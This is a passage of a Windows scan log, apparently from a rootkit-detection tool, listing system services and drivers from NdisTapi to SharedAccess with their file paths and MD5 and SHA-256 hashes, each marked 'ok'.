21:54:31.0729 0x1f20 NdisTapi - ok
21:54:31.0776 0x1f20 [ D8A65DAFB3EB41CBB622745676FCD072, 874D3C3D247C4A309DA813DB1D2EDB0037D3C489824BD5FE95B0C20699764EF7 ] Ndisuio         C:\Windows\system32\DRIVERS\ndisuio.sys
21:54:31.0791 0x1f20 Ndisuio - ok
21:54:31.0838 0x1f20 [ 38FBE267E7E6983311179230FACB1017, CFD1CBCA59650795C030DB30E5795B37C11C736E14003AE1DAB081BA5C0C9B14 ] NdisWan         C:\Windows\system32\DRIVERS\ndiswan.sys
21:54:31.0869 0x1f20 NdisWan - ok
21:54:31.0901 0x1f20 [ A4BDC541E69674FBFF1A8FF00BE913F2, 18CCFD063E9870B8B6958715BC0414C4D920AE63528EA1E9D7E30F7138918FFA ] NDProxy         C:\Windows\system32\drivers\NDProxy.sys
21:54:31.0932 0x1f20 NDProxy - ok
21:54:31.0947 0x1f20 [ 80B275B1CE3B0E79909DB7B39AF74D51, 75B406B0D9D28239D4EB2A298419A5F78A58237D88C5FD688EF1DFFAFACCF796 ] NetBIOS         C:\Windows\system32\DRIVERS\netbios.sys
21:54:31.0979 0x1f20 NetBIOS - ok
21:54:32.0025 0x1f20 [ 280122DDCF04B378EDD1AD54D71C1E54, F98B2ADE34F7E67C7C06C1D0FFB80ECBC353D044D4B4784CD952910345DC2ED0 ] NetBT           C:\Windows\system32\DRIVERS\netbt.sys
21:54:32.0103 0x1f20 NetBT - ok
21:54:32.0119 0x1f20 [ BF08DE8E4FA1F143D41B3241F7FCE5F6, 4140BE0ECE0D4B8FDD413DBA120F5D7EF6F94628224320EDA2A85E50BEFDA638 ] Netlogon        C:\Windows\system32\lsass.exe
21:54:32.0135 0x1f20 Netlogon - ok
21:54:32.0166 0x1f20 [ 7CCCFCA7510684768DA22092D1FA4DB2, BB9E4F8FABBF596D888E6D303CB54A336D9DFF95B36AEA9369D2ED787DDC4B5D ] Netman          C:\Windows\System32\netman.dll
21:54:32.0213 0x1f20 Netman - ok
21:54:32.0259 0x1f20 [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetMsmqActivator C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
21:54:32.0275 0x1f20 NetMsmqActivator - ok
21:54:32.0275 0x1f20 [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetPipeActivator C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
21:54:32.0306 0x1f20 NetPipeActivator - ok
21:54:32.0322 0x1f20 [ 8C338238C16777A802D6A9211EB2BA50, 0D08A47CD403EDA5E8CAD7409BBBBCDC29A9861D2DC41D42B68B22B1AA1EBDD6 ] netprofm        C:\Windows\System32\netprofm.dll
21:54:32.0384 0x1f20 netprofm - ok
21:54:32.0384 0x1f20 [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetTcpActivator C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
21:54:32.0400 0x1f20 NetTcpActivator - ok
21:54:32.0415 0x1f20 [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetTcpPortSharing C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
21:54:32.0431 0x1f20 NetTcpPortSharing - ok
21:54:32.0634 0x1f20 [ 58218EC6B61B1169CF54AAB0D00F5FE2, B76ABB2AD78CE68D30F0F08563B0593D658298CDCF1B138B6E9FB0D64CBCC3C2 ] netw5v32        C:\Windows\system32\DRIVERS\netw5v32.sys
21:54:32.0868 0x1f20 netw5v32 - ok
21:54:32.0899 0x1f20 [ 1D85C4B390B0EE09C7A46B91EFB2C097, 6A8850B151E88EE371F3CC543A946302DDF9494908D684B8B0C706A42CC54348 ] nfrd960         C:\Windows\system32\DRIVERS\nfrd960.sys
21:54:32.0915 0x1f20 nfrd960 - ok
21:54:32.0946 0x1f20 [ F115C5CD29E512F18BD7138A094B77E5, 90C2CE8B256EE9AABF674ADDE7F85E91DAF48EA368452D03C187A4AE027D4E39 ] NlaSvc          C:\Windows\System32\nlasvc.dll
21:54:32.0993 0x1f20 NlaSvc - ok
21:54:33.0008 0x1f20 [ 1DB262A9F8C087E8153D89BEF3D2235F, A51EE5D5AD3CD76B74BEA9C66C462608BF3B50C53DAA4110A75DB10495A8C101 ] Npfs            C:\Windows\system32\drivers\Npfs.sys
21:54:33.0039 0x1f20 Npfs - ok
21:54:33.0055 0x1f20 [ BA387E955E890C8A88306D9B8D06BF17, 3477BD9686C5777A93251C154512671AAA7533B18C536DF51F7B1D6D28E7F8A5 ] nsi             C:\Windows\system32\nsisvc.dll
21:54:33.0117 0x1f20 nsi - ok
21:54:33.0133 0x1f20 [ E9A0A4D07E53D8FEA2BB8387A3293C58, 690CAD6C4E35ECC1172A2E1FD3933DF73158B3BF42CB21244269612A53DE4D7A ] nsiproxy        C:\Windows\system32\drivers\nsiproxy.sys
21:54:33.0164 0x1f20 nsiproxy - ok
21:54:33.0273 0x1f20 [ C8DFF8D07755A66C7A4A738930F0FEAC, A2CC58312CE57988ABD976155BE91F558DCEC4C23481C6FBE64B361D511A36EA ] Ntfs            C:\Windows\system32\drivers\Ntfs.sys
21:54:33.0351 0x1f20 Ntfs - ok
21:54:33.0383 0x1f20 [ F9756A98D69098DCA8945D62858A812C, 572ADBFCFDE2030B34A013AADC14DBC144EB3F34D06991E2464A3EA9605BC045 ] Null            C:\Windows\system32\drivers\Null.sys
21:54:33.0414 0x1f20 Null - ok
21:54:33.0445 0x1f20 [ B5E37E31C053BC9950455A257526514B, 16E2880621F3AA12BDADE71CD7682CA79E2A199D3C9E3E5927C49DCEF0F6183B ] NVENETFD        C:\Windows\system32\DRIVERS\nvm62x32.sys
21:54:33.0476 0x1f20 NVENETFD - ok
21:54:33.0539 0x1f20 [ 9F8EE4948B7ADD9D12F778F61A2758A4, 9848C7D97AC000BF7A00BAE12593E48E14D36D7FFFCF25A163FAAB446691032F ] NVHDA           C:\Windows\system32\drivers\nvhda32v.sys
21:54:33.0570 0x1f20 NVHDA - ok
21:54:33.0960 0x1f20 [ 1E3D32DDBE6BBDC0843432BAD599069F, 908893652F953C01E3FFEA19E76154B6246277720B088A61086A9B336B3EC6AD ] nvlddmkm        C:\Windows\system32\DRIVERS\nvlddmkm.sys
21:54:34.0365 0x1f20 nvlddmkm - ok
21:54:34.0553 0x1f20 [ D6310F79E51D1F997E964E81DD368AEA, 27D0159F45C712C6165FDB9F40823438225555E71BB01E3B55F5B5D7BE15D389 ] NvNetworkService C:\Program Files\NVIDIA Corporation\NetService\NvNetworkService.exe
21:54:34.0615 0x1f20 NvNetworkService - ok
21:54:34.0662 0x1f20 [ B3E25EE28883877076E0E1FF877D02E0, 402B6FED6FBBF645190396DC141141EF52DD059DABD01F8AC9CF01D23664070C ] nvraid          C:\Windows\system32\drivers\nvraid.sys
21:54:34.0677 0x1f20 nvraid - ok
21:54:34.0693 0x1f20 [ 4380E59A170D88C4F1022EFF6719A8A4, 93EDB3F4CDBF53C9C1970DD29AB146E390695C568180847BA8903F5FBEABCFF2 ] nvstor          C:\Windows\system32\drivers\nvstor.sys
21:54:34.0709 0x1f20 nvstor - ok
21:54:34.0755 0x1f20 [ 5C83A0AFD51097C565C8D179B3C1A058, 55B1EC3A148AEEA1829B154D5BC87F2F0A426BE30D6939BCFCC958980B48AA15 ] NvStreamKms     C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys
21:54:34.0771 0x1f20 NvStreamKms - ok
21:54:35.0411 0x1f20 [ 1BC441268C99973E77E54000A2A7DC16, 81B866A4088873630730E4C3F78EC2CD0C1122A4980EDD2710EAC30441A33328 ] NvStreamSvc     C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
21:54:36.0128 0x1f20 NvStreamSvc - ok
21:54:36.0315 0x1f20 [ 5004DAF6A37C5C73FFCF4D3935A6FE87, 52F2149383EC41B18310801FD07C1363EE81C5D1F2B0206460FC7922C00D7A15 ] nvsvc           C:\Windows\system32\nvvsvc.exe
21:54:36.0347 0x1f20 nvsvc - ok
21:54:36.0409 0x1f20 [ FA3B7E6BD974251CE1160A471B497072, 0ABB83CAECAF9F8E9AD8D3FDD2F2F33419B7317B42D3C0AA62C414A6D887AB38 ] nvvad_WaveExtensible C:\Windows\system32\drivers\nvvad32v.sys
21:54:36.0425 0x1f20 nvvad_WaveExtensible - ok
21:54:36.0456 0x1f20 [ 5A0983915F02BAE73267CC2A041F717D, D83461D74597BF2BE042FEFCC27FCD18BF63CB8135B0666D731D50951C3468A8 ] nv_agp          C:\Windows\system32\drivers\nv_agp.sys
21:54:36.0487 0x1f20 nv_agp - ok
21:54:36.0518 0x1f20 [ 08A70A1F2CDDE9BB49B885CB817A66EB, 0BB98123B544124B144F3E95D77E01E973D060B8B2302503FF24ABBBE803EB63 ] ohci1394        C:\Windows\system32\drivers\ohci1394.sys
21:54:36.0565 0x1f20 ohci1394 - ok
21:54:36.0627 0x1f20 [ 30B5F9FB0C35AE6B4A0851D24CE2EE8B, 0340E77E8EC2ADC21B8DDD9C9CC95B3F4BCAFD54618A333C72D7D9587D593B83 ] ose             C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
21:54:36.0659 0x1f20 ose - ok
21:54:36.0893 0x1f20 [ EE5756BDA5BE5891270E0CC6CEC44096, EA18073EEE0F461B14C539D49A7DD91D33AB0C503236F67F70A000835FAAC890 ] osppsvc         C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
21:54:37.0080 0x1f20 osppsvc - ok
21:54:37.0127 0x1f20 [ 82A8521DDC60710C3D3D3E7325209BEC, C4E34571EDD57C7FBB3D736B5FE8BD154624705B5C8EA2EC898F19F75B9A5942 ] p2pimsvc        C:\Windows\system32\pnrpsvc.dll
21:54:37.0173 0x1f20 p2pimsvc - ok
21:54:37.0189 0x1f20 [ 59C3DDD501E39E006DAC31BF55150D91, E02B63AB7F34CF6FF3F644AF354D10004E6F50014E03172D80BD78934EF71EF1 ] p2psvc          C:\Windows\system32\p2psvc.dll
21:54:37.0392 0x1f20 p2psvc - ok
21:54:37.0407 0x1f20 [ 2EA877ED5DD9713C5AC74E8EA7348D14, 14BA3722CE5F8FF07F2D97DCDD6558EB49C9B02E5E6FAD6D9F18D354733EFECE ] Parport         C:\Windows\system32\DRIVERS\parport.sys
21:54:37.0470 0x1f20 Parport - ok
21:54:37.0485 0x1f20 [ 3F34A1B4C5F6475F320C275E63AFCE9B, 31295D5121C0C3F2085E0EEBA260EEE4CA003993C026E2F81986D19158036E6B ] partmgr         C:\Windows\system32\drivers\partmgr.sys
21:54:37.0517 0x1f20 partmgr - ok
21:54:37.0532 0x1f20 [ EB0A59F29C19B86479D36B35983DAADC, AC09AFE7F13BE4079D01383BAC44091997E1AAF6512C9673A42B9E3780EB08A8 ] Parvdm          C:\Windows\system32\DRIVERS\parvdm.sys
21:54:37.0563 0x1f20 Parvdm - ok
21:54:37.0610 0x1f20 [ 3A55D53687F16D9EF5BF307BBFEFCD9C, F1BB1B43442B151686500768C43A4D20CAA47427E78386953A42DDB42D9DDF0C ] PcaSvc          C:\Windows\System32\pcasvc.dll
21:54:37.0641 0x1f20 PcaSvc - ok
21:54:37.0673 0x1f20 [ 673E55C3498EB970088E812EA820AA8F, 1F81315664B8CBFDD569416C0ECCE4C6251F34577313A0858AB46609781303B5 ] pci             C:\Windows\system32\drivers\pci.sys
21:54:37.0704 0x1f20 pci - ok
21:54:37.0735 0x1f20 [ AFE86F419014DB4E5593F69FFE26CE0A, CAF36E61BE7B511D3A03A65FF5A3017CEE4D2F53005B410F2D4A2AAE9FED4C00 ] pciide          C:\Windows\system32\drivers\pciide.sys
21:54:37.0751 0x1f20 pciide - ok
21:54:37.0766 0x1f20 [ F396431B31693E71E8A80687EF523506, BC614FC21E029E2497F1CCE3131BBD295B827F2310762B47D5BBC7703D80554B ] pcmcia          C:\Windows\system32\DRIVERS\pcmcia.sys
21:54:37.0782 0x1f20 pcmcia - ok
21:54:37.0797 0x1f20 [ 250F6B43D2B613172035C6747AEEB19F, A91F15B133F2619912CF750E6F3662E011CD0FA4B9477CE532CE3196D23307D9 ] pcw             C:\Windows\system32\drivers\pcw.sys
21:54:37.0813 0x1f20 pcw - ok
21:54:37.0891 0x1f20 [ 344D1FA0438A967F1A2BAA42C86D6E19, E9CB31CBD9075B84BA771CF82A4C3AB5BF57ADEA3E76ABE8FE36FEACFD681D89 ] PEAUTH          C:\Windows\system32\drivers\peauth.sys
21:54:38.0000 0x1f20 PEAUTH - ok
21:54:38.0250 0x1f20 [ 414BBA67A3DED1D28437EB66AEB8A720, D6DF254E2615FA402044824DCD9004F579FC0DF74B90E44C99D5F0253CF8AD88 ] pla             C:\Windows\system32\pla.dll
21:54:38.0375 0x1f20 pla - ok
21:54:38.0421 0x1f20 [ EC7BC28D207DA09E79B3E9FAF8B232CA, A42F8F69C3CD753D787A5D558659DEA2CC306C896D75B8C82549219CF654504F ] PlugPlay        C:\Windows\system32\umpnpmgr.dll
21:54:38.0468 0x1f20 PlugPlay - ok
21:54:38.0499 0x1f20 [ 63FF8572611249931EB16BB8EED6AFC8, 9732CCBCB93A7A4BEC88812B952C20244479E9BD781240C195E57F09E619EA33 ] PNRPAutoReg     C:\Windows\system32\pnrpauto.dll
21:54:38.0546 0x1f20 PNRPAutoReg - ok
21:54:38.0562 0x1f20 [ 82A8521DDC60710C3D3D3E7325209BEC, C4E34571EDD57C7FBB3D736B5FE8BD154624705B5C8EA2EC898F19F75B9A5942 ] PNRPsvc         C:\Windows\system32\pnrpsvc.dll
21:54:38.0609 0x1f20 PNRPsvc - ok
21:54:38.0671 0x1f20 [ 53946B69BA0836BD95B03759530C81EC, 7F14A34635354CCA0F5342C8D9DF5A6AA1B94F6A508BD8834029E9BACF252920 ] PolicyAgent     C:\Windows\System32\ipsecsvc.dll
21:54:38.0718 0x1f20 PolicyAgent - ok
21:54:38.0733 0x1f20 [ F87D30E72E03D579A5199CCB3831D6EA, B09328E89954584F97908FA5946376BA990B8C650DABCBF3CA3B08719937C694 ] Power           C:\Windows\system32\umpo.dll
21:54:38.0765 0x1f20 Power - ok
21:54:38.0811 0x1f20 [ 631E3E205AD6D86F2AED6A4A8E69F2DB, 1D3BF0CFC37D91A3A56246920B9CF1084E78A055D56E85A773417809C58C8065 ] PptpMiniport    C:\Windows\system32\DRIVERS\raspptp.sys
21:54:38.0858 0x1f20 PptpMiniport - ok
21:54:38.0889 0x1f20 [ 85B1E3A0C7585BC4AAE6899EC6FCF011, 1E067113C146D6842D7FB04007F363D6FB7783C6BC7C9AB6614E44075C4F86C3 ] Processor       C:\Windows\system32\DRIVERS\processr.sys
21:54:38.0921 0x1f20 Processor - ok
21:54:38.0952 0x1f20 [ FD9692A3D31E021207D3C2A9DDDC2BE3, 5295EFAD9BD4B59996935A41825392C12A4C968D161BEEA37797F90AF8E54229 ] ProfSvc         C:\Windows\system32\profsvc.dll
21:54:38.0999 0x1f20 ProfSvc - ok
21:54:39.0014 0x1f20 [ BF08DE8E4FA1F143D41B3241F7FCE5F6, 4140BE0ECE0D4B8FDD413DBA120F5D7EF6F94628224320EDA2A85E50BEFDA638 ] ProtectedStorage C:\Windows\system32\lsass.exe
21:54:39.0045 0x1f20 ProtectedStorage - ok
21:54:39.0077 0x1f20 [ 6270CCAE2A86DE6D146529FE55B3246A, 463209CBAF1B0E269DC8FC6FBDEE5BB7E5ADB5D3F024930BFD0B97E0A9678883 ] Psched          C:\Windows\system32\DRIVERS\pacer.sys
21:54:39.0108 0x1f20 Psched - ok
21:54:39.0186 0x1f20 [ AB95ECF1F6659A60DDC166D8315B0751, 0ED6D3460D28978BADF31B930DBB3298A6A10EFF8883763EABA0E36A21A0E83D ] ql2300          C:\Windows\system32\DRIVERS\ql2300.sys
21:54:39.0264 0x1f20 ql2300 - ok
21:54:39.0279 0x1f20 [ B4DD51DD25182244B86737DC51AF2270, 7E62B04F054A6330B7F9968222523BDE8F3EE47A11D17E6C0E2D5ACDC07B9E6B ] ql40xx          C:\Windows\system32\DRIVERS\ql40xx.sys
21:54:39.0295 0x1f20 ql40xx - ok
21:54:39.0373 0x1f20 [ 31AC809E7707EB580B2BDB760390765A, A8481FD19A0F778F5591B7676F591F664ADC68B6867E663C0F9564173F4AC909 ] QWAVE           C:\Windows\system32\qwave.dll
21:54:39.0420 0x1f20 QWAVE - ok
21:54:39.0451 0x1f20 [ 584078CA1B95CA72DF2A27C336F9719D, 836F115C92D343463C14A9DE39648C1EFA7C7EE4720F5C692EE0F68B84830121 ] QWAVEdrv        C:\Windows\system32\drivers\qwavedrv.sys
21:54:39.0467 0x1f20 QWAVEdrv - ok
21:54:39.0498 0x1f20 [ 30A81B53C766D0133BB86D234E5556AB, 726C6B83B5ACAA84CAB1689B6DD6DDAE3199D61A57B5D7B5B5A0F62FCF838090 ] RasAcd          C:\Windows\system32\DRIVERS\rasacd.sys
21:54:39.0529 0x1f20 RasAcd - ok
21:54:39.0560 0x1f20 [ 57EC4AEF73660166074D8F7F31C0D4FD, C66B425EC4DB5E7FD289AE631C9B019EB16717C55E80FAE964BB22203E4AACEF ] RasAgileVpn     C:\Windows\system32\DRIVERS\AgileVpn.sys
21:54:39.0607 0x1f20 RasAgileVpn - ok
21:54:39.0623 0x1f20 [ A60F1839849C0C00739787FD5EC03F13, B210DFA5A843CF1DA73635F168E2EA5052CBED15C664F8523CDFB34CA165D0E0 ] RasAuto         C:\Windows\System32\rasauto.dll
21:54:39.0669 0x1f20 RasAuto - ok
21:54:39.0685 0x1f20 [ D9F91EAFEC2815365CBE6D167E4E332A, 8350457A39D141C13807E7DB5A8D4113197C4016F7744B9993391F4AEA0C4A5C ] Rasl2tp         C:\Windows\system32\DRIVERS\rasl2tp.sys
21:54:39.0732 0x1f20 Rasl2tp - ok
21:54:39.0779 0x1f20 [ CB9E04DC05EACF5B9A36CA276D475006, 4D8C0AEF1D4F84F375AD2BAF786C9F6C52316A3E655B913449E71AD7C0FCA56E ] RasMan          C:\Windows\System32\rasmans.dll
21:54:39.0841 0x1f20 RasMan - ok
21:54:39.0857 0x1f20 [ 0FE8B15916307A6AC12BFB6A63E45507, 64119474DE7499E6E8B82E78BBD50074B3AA70B3E8329089FAE9B7F29919004E ] RasPppoe        C:\Windows\system32\DRIVERS\raspppoe.sys
21:54:39.0888 0x1f20 RasPppoe - ok
21:54:39.0903 0x1f20 [ 44101F495A83EA6401D886E7FD70096B, 56A0CE5C89870752B9B2AB795C1A248CA28209E049B2F20CCA0308CBE2488A0A ] RasSstp         C:\Windows\system32\DRIVERS\rassstp.sys
21:54:39.0950 0x1f20 RasSstp - ok
21:54:39.0981 0x1f20 [ D528BC58A489409BA40334EBF96A311B, C71E9A4B101DB6C3183B9F97B9098D73D6FE1B12C05C2EB3CE8A8041BEE6BA61 ] rdbss           C:\Windows\system32\DRIVERS\rdbss.sys
21:54:40.0075 0x1f20 rdbss - ok
21:54:40.0153 0x1f20 [ 0D8F05481CB76E70E1DA06EE9F0DA9DF, 2AFCBE3237D27AFBF095F91F1FCCA63E6890F34A9E4F00E5C34C92394CDA89FB ] rdpbus          C:\Windows\system32\DRIVERS\rdpbus.sys
21:54:40.0184 0x1f20 rdpbus - ok
21:54:40.0215 0x1f20 [ 23DAE03F29D253AE74C44F99E515F9A1, 8FED93D10B2062F0526FE3508101F8FCF8F72DEB90AFB472EB7CBAE83A0EC430 ] RDPCDD          C:\Windows\system32\DRIVERS\RDPCDD.sys
21:54:40.0278 0x1f20 RDPCDD - ok
21:54:40.0309 0x1f20 [ 5A53CA1598DD4156D44196D200C94B8A, 8112FE14FEC94C67B1C5BDE4171E37584F1D0098D2C557C9E4BDD3E0291E25E4 ] RDPENCDD        C:\Windows\system32\drivers\rdpencdd.sys
21:54:40.0340 0x1f20 RDPENCDD - ok
21:54:40.0371 0x1f20 [ 44B0A53CD4F27D50ED461DAE0C0B4E1F, CDA80B08E67AD034081C0C920CD66147689F1844403CBC552F65005E7C011A91 ] RDPREFMP        C:\Windows\system32\drivers\rdprefmp.sys
21:54:40.0387 0x1f20 RDPREFMP - ok
21:54:40.0481 0x1f20 [ 65375DF758CA1872AB7EBBBA457FD5E6, 8AC7681F51277E799C22FF95FA0B833E9E260D37C0416319FF05B66FB3948005 ] RdpVideoMiniport C:\Windows\system32\drivers\rdpvideominiport.sys
21:54:40.0512 0x1f20 RdpVideoMiniport - ok
21:54:40.0605 0x1f20 [ CD9214A6AE17D188D17C3CF8CB9CC693, 2E16FF1F7446F0600D6519010FD05A30B94D97167C16B3E7FC396A97D8139D60 ] RDPWD           C:\Windows\system32\drivers\RDPWD.sys
21:54:40.0668 0x1f20 RDPWD - ok
21:54:40.0715 0x1f20 [ 518395321DC96FE2C9F0E96AC743B656, 5F6A0880B4F3EE7196259EA362DA9554B0687B0236F9A8E5CF7A4A77F01F1776 ] rdyboost        C:\Windows\system32\drivers\rdyboost.sys
21:54:40.0746 0x1f20 rdyboost - ok
21:54:40.0793 0x1f20 [ 7B5E1419717FAC363A31CC302895217A, 048B96B127CC20833948DAE53C59886D5C725ECA7A744424A01339447D2DDC32 ] RemoteAccess    C:\Windows\System32\mprdim.dll
21:54:40.0902 0x1f20 RemoteAccess - ok
21:54:40.0917 0x1f20 [ CB9A8683F4EF2BF99E123D79950D7935, B9FA3E7E91E76D975CF40BFA37909E50F29CC13AB1399007884710651827E9AA ] RemoteRegistry C:\Windows\system32\regsvc.dll
21:54:40.0995 0x1f20 RemoteRegistry - ok
21:54:41.0027 0x1f20 [ CB928D9E6DAF51879DD6BA8D02F01321, DFD263B67DDF98AE09AF6D6986CBC7BE3206BCE8403AAC51BCF9459E78233D12 ] RFCOMM          C:\Windows\system32\DRIVERS\rfcomm.sys
21:54:41.0058 0x1f20 RFCOMM - ok
21:54:41.0105 0x1f20 [ 498EB62A160674E793FA40FD65390625, F7EFD480E6C95F5B6202EEB87F519A8A8187F7F26281FB3E302EDD1AD5771025 ] RichVideo       C:\Program Files\CyberLink\Shared files\RichVideo.exe
21:54:41.0120 0x1f20 RichVideo - ok
21:54:41.0151 0x1f20 [ 78D072F35BC45D9E4E1B61895C152234, 80C924EE1156B4E3172E83DCB9C60817E87885FB9377647E0BF90153E415B1CA ] RpcEptMapper    C:\Windows\System32\RpcEpMap.dll
21:54:41.0198 0x1f20 RpcEptMapper - ok
21:54:41.0214 0x1f20 [ 94D36C0E44677DD26981D2BFEEF2A29D, D77A93AC60536F3706E8A0154C0C2199E888B7748C84DB7437254FF175F4DF55 ] RpcLocator      C:\Windows\system32\locator.exe
21:54:41.0261 0x1f20 RpcLocator - ok
21:54:41.0292 0x1f20 [ 7660F01D3B38ACA1747E397D21D790AF, 04611B43705C064C2A8331F6D3F8E4530295694AE2C3E3EC3F62CFF4A5EFA88D ] RpcSs           C:\Windows\system32\rpcss.dll
21:54:41.0339 0x1f20 RpcSs - ok
21:54:41.0370 0x1f20 [ 032B0D36AD92B582D869879F5AF5B928, 0F8F18A6A0A689957B886D9368015889091094EDA18BE532093F06A70A7CE184 ] rspndr          C:\Windows\system32\DRIVERS\rspndr.sys
21:54:41.0401 0x1f20 rspndr - ok
21:54:41.0464 0x1f20 [ 5283B9A27FF230F2FF70D92451FF409A, B8BAC70E1DE4485C79CA7B47D4DCFE0223CECEA8ED75CE4F128D47051F95FE5D ] RTL8167         C:\Windows\system32\DRIVERS\Rt86win7.sys
21:54:41.0495 0x1f20 RTL8167 - ok
21:54:41.0510 0x1f20 [ BF08DE8E4FA1F143D41B3241F7FCE5F6, 4140BE0ECE0D4B8FDD413DBA120F5D7EF6F94628224320EDA2A85E50BEFDA638 ] SamSs           C:\Windows\system32\lsass.exe
21:54:41.0557 0x1f20 SamSs - ok
21:54:41.0620 0x1f20 [ 05D860DA1040F111503AC416CCEF2BCA, DAE2F37D09A5A42F945BC8E27E4EA2303521081783A80CEE7FEE7C5A1C2CFC5E ] sbp2port        C:\Windows\system32\drivers\sbp2port.sys
21:54:41.0651 0x1f20 sbp2port - ok
21:54:41.0666 0x1f20 [ 8FC518FFE9519C2631D37515A68009C4, 21E10585470CF9FC3BD1977F8A426686CD2FA6BD2094B9E3594B21C7C4541D25 ] SCardSvr        C:\Windows\System32\SCardSvr.dll
21:54:41.0776 0x1f20 SCardSvr - ok
21:54:41.0807 0x1f20 [ 0693B5EC673E34DC147E195779A4DCF6, AF1B56FBF3ADABF94CD9DBA67586B8746DE135151F6B3D1B0EE315BC1E2DB670 ] scfilter        C:\Windows\system32\DRIVERS\scfilter.sys
21:54:41.0838 0x1f20 scfilter - ok
21:54:41.0916 0x1f20 [ A04BB13F8A72F8B6E8B4071723E4E336, E63287FF71C39CBF64C3347C455324C8437F9CF398153E269543588B65389502 ] Schedule        C:\Windows\system32\schedsvc.dll
21:54:41.0978 0x1f20 Schedule - ok
21:54:42.0010 0x1f20 [ 319C6B309773D063541D01DF8AC6F55F, 182F392FE839499D159A30A3CD04B5D0C87219930BFB1A7456880B7DA75B9820 ] SCPolicySvc     C:\Windows\System32\certprop.dll
21:54:42.0041 0x1f20 SCPolicySvc - ok
21:54:42.0072 0x1f20 [ 0328BE1C7F1CBA23848179F8762E391C, EA80853F04BAE6F46F658B3EFED34BFDDE20E6F2BDA349EBC17EC75DFF19855D ] sdbus           C:\Windows\system32\drivers\sdbus.sys
21:54:42.0103 0x1f20 sdbus - ok
21:54:42.0134 0x1f20 [ 08236C4BCE5EDD0A0318A438AF28E0F7, 77727F963F63C4CEC11E7AAD5FB3836179701D512CA9436C3170B9E6A4E5F888 ] SDRSVC          C:\Windows\System32\SDRSVC.dll
21:54:42.0166 0x1f20 SDRSVC - ok
21:54:42.0197 0x1f20 [ 90A3935D05B494A5A39D37E71F09A677, F72733A69BC6E1A2BB91D7632FF3463C12563F60FDCC00A2CDD67FF20D479952 ] secdrv          C:\Windows\system32\drivers\secdrv.sys
21:54:42.0244 0x1f20 secdrv - ok
21:54:42.0259 0x1f20 [ A59B3A4442C52060CC7A85293AA3546F, 1776D6DEE51991149265AAF39E17065E301C5FA1FF4068653DC0010B9B27185D ] seclogon        C:\Windows\system32\seclogon.dll
21:54:42.0306 0x1f20 seclogon - ok
21:54:42.0322 0x1f20 [ DCB7FCDCC97F87360F75D77425B81737, F8289AF2C458C167038EEFE613EE5E3D6D5B3308B8784168374BC81C47891CE5 ] SENS            C:\Windows\System32\sens.dll
21:54:42.0353 0x1f20 SENS - ok
21:54:42.0400 0x1f20 [ 50087FE1EE447009C9CC2997B90DE53F, B5E6CF1D991F87C29C5E28198E0962E31FFB499A46C3BD43FC20391693389959 ] SensrSvc        C:\Windows\system32\sensrsvc.dll
21:54:42.0446 0x1f20 SensrSvc - ok
21:54:42.0462 0x1f20 [ 9AD8B8B515E3DF6ACD4212EF465DE2D1, E2F019BCD1446236D078D46065DD151DD068778F33BE2F1E8A0CC1EA2F954E86 ] Serenum         C:\Windows\system32\DRIVERS\serenum.sys
21:54:42.0478 0x1f20 Serenum - ok
21:54:42.0493 0x1f20 [ 5FB7FCEA0490D821F26F39CC5EA3D1E2, A26DB2EB9F3E2509B4EBA949DB97595CC32332D9321DF68283BFC102E66D766F ] Serial          C:\Windows\system32\DRIVERS\serial.sys
21:54:42.0509 0x1f20 Serial - ok
21:54:42.0556 0x1f20 [ 79BFFB520327FF916A582DFEA17AA813, 7A2A9D69BE02228591186A9F4453D4B5FD98837CA422C873C48040170E8BD18C ] sermouse        C:\Windows\system32\DRIVERS\sermouse.sys
21:54:42.0587 0x1f20 sermouse - ok
21:54:42.0649 0x1f20 [ 4AE380F39A0032EAB7DD953030B26D28, C8F5F2DD59574E966FDF3057867BB959A554BAB6FD5DC6F1427094A6BC2B2809 ] SessionEnv      C:\Windows\system32\sessenv.dll
21:54:42.0696 0x1f20 SessionEnv - ok
21:54:42.0727 0x1f20 [ 9F976E1EB233DF46FCE808D9DEA3EB9C, 6A5C53F27F8BCA85CE206EE7D196176F67EC6FFA5D4830373A20792C149B5E75 ] sffdisk         C:\Windows\system32\drivers\sffdisk.sys
21:54:42.0758 0x1f20 sffdisk - ok
21:54:42.0790 0x1f20 [ 932A68EE27833CFD57C1639D375F2731, 11D6B98FBEEE2B9C7B06EF7091857BBD3B349077997D6261D66280668FD1B5C3 ] sffp_mmc        C:\Windows\system32\drivers\sffp_mmc.sys
21:54:42.0821 0x1f20 sffp_mmc - ok
21:54:42.0821 0x1f20 [ 6D4CCAEDC018F1CF52866BBBAA235982, AAC41F5C97B3FE5A3DC0838457EB8CC9BB71FCA16D3EDBB67D603F0A9D46C131 ] sffp_sd         C:\Windows\system32\drivers\sffp_sd.sys
21:54:42.0852 0x1f20 sffp_sd - ok
21:54:42.0883 0x1f20 [ DB96666CC8312EBC45032F30B007A547, C3AE60FC65A36E96E0D2CC6E184481D70F91A19DC3E2E17E2873DD670A592DD7 ] sfloppy         C:\Windows\system32\DRIVERS\sfloppy.sys
21:54:42.0946 0x1f20 sfloppy - ok
21:54:42.0977 0x1f20 [ D1A079A0DE2EA524513B6930C24527A2, E2BC16DBCF38841EECD49C6FA1A9AC89C17F332F12606CA826F058E995E1B83D ] SharedAccess    C:\Windows\System32\ipnathlp.dll
21:54:43.0024 0x1f20 SharedAccess - ok
